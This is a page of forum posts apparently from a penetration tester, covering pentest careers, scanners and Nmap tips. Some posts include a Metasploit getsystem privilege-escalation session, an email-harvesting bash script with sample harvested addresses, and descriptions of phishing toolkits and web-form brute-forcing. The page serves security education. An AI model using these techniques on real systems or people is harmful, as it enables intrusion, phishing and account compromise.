|
EH-Net
|
|
May 23, 2013, 12:47:22 AM
|
 Show Posts
|
|
Pages: 1 2 [3] 4 5 ... 22
|
|
31
|
Resources / Career Central / Re: Becoming Pentester / EH
|
on: March 19, 2010, 10:38:37 PM
|
|
Hey Pizza1337,
Here's what i would suggest. If you are heading in that direction, always go for a 4 year degree. I know there are good examples of lots of pentesters not getting a 4 year year degree but honestly you will hit a lot of glass ceilings not having one. it doesnt realy matter all that much from where you get it, just get it.
Try to find a college with a network security program, or lots of electives in that area or pick a major that's related. Do you want to do do practical pentesting? Try and find a networking or IT degree, are you interested in developing exploits or tools? Take Computer Science. There are lots of programs that have security electives. Take at least one per semester/quarter, to keep your interest.
I know some guys at UCSB (the team that competes as shellphish) and they have had a running hacking club ever since they won Defcon. Do that, try and compete in ccdc competitions if you have it in your region.
Lastly look for summer internships with security places that do pentests or assessments. Learn all the industry tools, do all the training you can find on the net, and start writing your own scripts. Even if they are just simple things you think are cool, they show passion for the field.
Start a website or blog, go to cons, and come here when you have questions.
i know thats a lot but, sorry, must have brain dumped there =P
|
|
|
|
|
32
|
Resources / Tools / Re: Skipfish, Google Enters the Web Scanner Fray
|
on: March 19, 2010, 08:25:31 PM
|
No problem Ketchup! Part of my job is "competitive analysis" and "research" so im always testing and reviewing new tech. A web scanner from Google was big news so we took the morning in the lab to test =) I love pentesting and writing about pentesting. Luckily its my job and my passion. That plus i drink a lot of coffee and live on the twitter stream  |
|
|
|
|
33
|
Resources / Tools / Skipfish, Google Enters the Web Scanner Fray
|
on: March 19, 2010, 05:58:27 PM
|
Just wrote a quick review and jotted down some insights to Google's new web application security scanner. Skipfish. Read the whole thing at the link or just check out the "skinny" The Skinny: We like it. As Google says, its not an end-all-be-all for web application scanners, but it definitely has some great logic, features, and is blazing fast. Also if you have seen the dev track the developer Michal Zalewski has been quick to update for problems (1.01b fixes some crashing problems) and has some great upcoming features planned (pause/resume, VIEWSTATE testing, etc.) Although no scanner will ever replace a smart web app assessment engineer, Skipfish shows some great potential in the security space and… its free. It wont replace any of our manual processes but we will definitely use it when applicable. Thanks Google. http://www.redspin.com/blog/2010/03/19/skipfish-google-enters-the-web-scanner-fray/ |
|
|
|
|
38
|
Resources / Tutorials / Re: Beginners guide to Nmap
|
on: March 16, 2010, 11:32:55 AM
|
Just some added Nmap love: - Nmap used to be less than proficient when it came to UDP scanning, but if you've become accustom to using other tools like unicorscan or udp-proto-scanner (full payload type UDP scanners) you can be relieved that Nmap has added this into releases since a few months ago.
- if yo need to scan all ports the secret unreferenced flag is "-p-"
- If you are doing version scanning I always find it valuable to script scan as well "--script=All"
- The nmap book is the best hands down resource for scanning knowledge. http://nmap.org/book/ and to keep updated with features and scripts that are added always check http://nmap.org/changelog.html
|
|
|
|
|
40
|
Resources / Tools / Getsystem privledge escalation using Metasploit
|
on: March 15, 2010, 05:52:31 PM
|
Sorry to spam the posts guys, i just thought people would like to read these. Videos are at the bottom link: A few weeks ago Chris Gates (ala Attack Research/Carnal Ownage/ethicalhacker.net) and Joshua Gauthier showed some quick snippets of Metasploit’s Getsystem extension. Getsystem is meterpreter’s new (windows) privilege escalation extension used in the priv module.
Getsystem uses several techniques for priv escalation:
* Windows Impersonation Tokens (fixed by MS09-012)
* Abusing LSASS via token passing (Pass-the-Hash) which requires Administrator anyway.
* Exploiting weak permissions (read and write) in the services (most of them by default run as SYSTEM, if you are lucky they run as a domain administrator).
* Improved KiTrap0D exploit released by Tavis Ormandy ( MS10-015 patched as of now)
As more privilege escalation exploits appear this year they will no doubt be rolled into the Getsystem extension which i will be keeping a watchful eye on. Thanks to Stephen Fewer for adding the new functionality to Getsystem.
Also, check out Bernardo Damele’s (author of SQLmap!) walkthrough on integrating Metasploit privilege escalation via SQLmap for post database exploitation. Here.
And a sample of the KiTrap0D exploit below in MSF by Pieter Danhieux (not Getsystem but same functionality):
Kitrap0d in Metasploi 3.3.4-DEV
meterpreter > use priv
Loading extension priv…success.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to ‘0′).
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)
meterpreter > getsystem -t 1
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
http://www.securityaegis.com/getsystem-privilege-escalation-via-metasploit/ |
|
|
|
|
41
|
Resources / Tools / Gathering logins/emails with theHarvester and Metasploit
|
on: March 15, 2010, 05:37:17 PM
|
Like GI Joe always said: Knowing is half the battle… And so it is the same with Pentesting. One of the first parts of recon in a pentest is gathering valid login names and emails. We can use these to profile our target, bruteforce authentication systems, send client-side attacks (through phishing), look through social networks for juicy info on platforms and technologies, etc. Where do we get this info? Well without doing a full-blown Open Source Recon (OSINT) style assessment, we can use two simple scripts; Metasploit's search_email_collector.rb and Edge-Security's theHarvester. theHarvester (luckily for us) just updated to v1.5 and has now fixed some of its previous bugs with searching Bing and LinkedIn. It supports searching Google, Bing, PGP servers, and LinkedIn. Metasploit, under modules/auxiliary/gather, has search_email_collector.rb and uses similar techniques for Google, Bing, and Yahoo. A quick usage below identifies some users p.s. you can one line search_email_collector like so in msfcli: ruby /framework3/msfcli auxiliary/gather/search_email_collector DOMAIN=your_target_domain OUTFILE=output_file_you_want_results_in E Check the last line for an example wrapper for these two tools. zombie@haktop:/tools/email/theHarvester# ./theHarvester.py -d defcon.com -b google -l 500 ************************************* *TheHarvester Ver. 1.5 * *Coded by Christian Martorella * *Edge-Security Research * * cmartorella@edge-security.com * ************************************* Searching for defcon.com in google : ====================================== Total results: 462000 Limit: 500 Searching results: 0 Searching results: 100 Searching results: 200 Searching results: 300 Searching results: 400 Accounts found: ==================== quietpro@defcon.comnick.s@defcon.comrobert@defcon.comlynne@defcon.com@defcon.com joe@defcon.cominfo@defcon.comdtangent@defcon.com==================== And search_email_collector.rb usage here: Running MSF search_email_collector... We can wrap both these with a quick (albeit dirty) bash script (this example uses Backtrack paths): #!/bin/bash echo "Running MSF search_email_collector..." echo ruby /pentest/exploits/framework3/msfcli auxiliary/gather/search_email_collector DOMAIN=$1 OUTFILE=$1_emails.txt E echo echo "Running theHarvester on Google, BING, MSN, PGP..." echo perl /pentest/enumeration/google/theHarvester/theHarvester.py -d $1 -b google -l 500 >> $1_emails.txt perl /pentest/enumeration/google/theHarvester/theHarvester.py -d $1 -b msn -l 500 >> $1_emails.txt perl /pentest/enumeration/google/theHarvester/theHarvester.py -d $1 -b pgp >> $1_emails.txt cat $1_emails.txt | grep @ |grep -v @edge-security.com |sort > $1_emails.txt echo echo "Searching for LinkedIN profiles with theHarverster..." perl /pentest/enumeration/google/theHarvester/theHarvester.py -d $1 -b linkedin -l 40 >> $1_emails.txt echo echo "Finishing... E-mail Results:" echo cat $1_emails.txt |
|
|
|
|
42
|
Resources / Tools / Exploit the User with SET – The Social Engineering Toolkit
|
on: March 15, 2010, 05:33:25 PM
|
Another Tool Post, full link with videos at the bottom of quote: I have to say… SET is just plain awesome. The Social Engineering Toolkit (SET) is a set of python scripts created by David Kennedy (aka rel1k) to automate many client side penetration testing vectors. In conjunction with Social-Engineer.org, which is also a top-notch resource, it provides for some of best extensibility in this type testing. A couple of weekends ago Dave released 0.4 of SET at Shmoocon. I’ll be honest, i hadn’t used it much until now but, after a good bit of research I now appreciate its full glory. SET’s Python scripts allow you to easily create phishing email attacks, create clones of any given URLs you provide it in a web based attack, and then on that page exploit the users machine using a java applet or browser exploits. It can create Malicious PDFs as well. In 0.4 there are many improvements: - An improved java applet that is multi-platform and deals well with any permission type - 0.4 adds Metasploit browser exploits in addition to the java applet - Can launch the “Aurora” style attacks with Metasploit - Improved cloned sites and redirect to legit site. - Integrates with Backtrack’s sendmail or gmail addresses - Spear phishing with input of email lists improved The SET is highly tied to the Backtrack and Social-Engineer.org communities. Training authors and contributors to these sites are well recognized penetration testers with a high level of interest on client-side and social engineering based attack vectors. You’ll recognize names like Paul Hand, Chris Nickerson, Mati Aharoni, Chris Hadnagy, of course Dave Kennedy, etc, all working on these projects. In addition a whole section of the free Metasploit Unleashed training is dedicated to SET and they have an excellent setup and usage article here. Also Social-Engineer.org has an excellent writeup as well. SET has a large fanbase with many useful videos on usage and customized scopes. The First video is actually the new SET 0.4 updates presentation and a recording of all the Firetalks (shorter than regular presentations) at Shmoocon, recorded by Adrian Crenshaw (Irongeek). Check it and some of the other vids below =) Videos Here: http://www.securityaegis.com/exploit-the-user-with-set-the-social-engineering-toolkit/#more-979 |
|
|
|
|
43
|
Resources / Tools / Easy, breezy, beautiful, password attacking…
|
on: March 15, 2010, 05:05:28 PM
|
Small post from my site =) Bruting web forms usually is part of a web app assessment. We love to use Hydra, Medusa, or Wfuzz for this but we recently stumbled across a tool that makes it much easier. It's called Fireforce. It's a Firefox extension that gives you point and click bruting. We ran it in our labs with about a 74% success rate, meaning it mapped the parameters for web form logins correctly and gave us the correct password back (aka it didn't spaz out and kill our browser). So it isn't perfect, but we're willing to forgive that for it's ease of use. It's dead simple. Give it a username, right click in the form password field, give it the text the login form gives on an unsuccessful login, and a bruteforce list. Make sure to read the documentation as you'll need to use a seperate firefox profile if you wish to browse will while using the tool, (it's a mem/cpu hogger). *note* We haven't done a code analysis on the extension, use at your own risk in your lab. Also, yesterday we tweeted about Ron Bowes of Skullsecurity.com's password analysis and password list collection which are much win. Ron has done some data analysis on some of the leaked password lists of the last few years like RockYou, MySpace, and PhpBB. He also stores the default password lists of many common industry tools, and even the passwords conficker used to spread. I'd grab these lists if you dont already have them, who knows how long they will stay up. Remember, password bruteforcing is great as long as you don't DOS the application/server. Also remember just because it's a web form doesnt mean its not tied to another backend system (ldap, etc) so be aware you could lockout users. Also you might wanna check out our writeup a bit back on password attacks here. Get Fireforce HereGet Password Lists HereCatch Ron on twitter: @iagox86 |
|
|
|
|
44
|
Resources / Tools / Identifying Server Applications
|
on: March 15, 2010, 12:58:20 PM
|
Hello All, Thought i'd share a tool for identifying platform versions. Its a Firefox Plugin that will use screen scraping, default header locations, and other tricks to gather the app software (Django, DokuWiki, Drupal, Joomla (2), MediaWiki, MoinMoin, phpBB, Reddit, Wordpress) and version. Very useful in web app hackery. http://www.backendinfo.com/ |
|
|
|
|
Loading...
|
Editor-In-Chief : Special Xmas Deal: 10% Off eLearnSecurity Courses
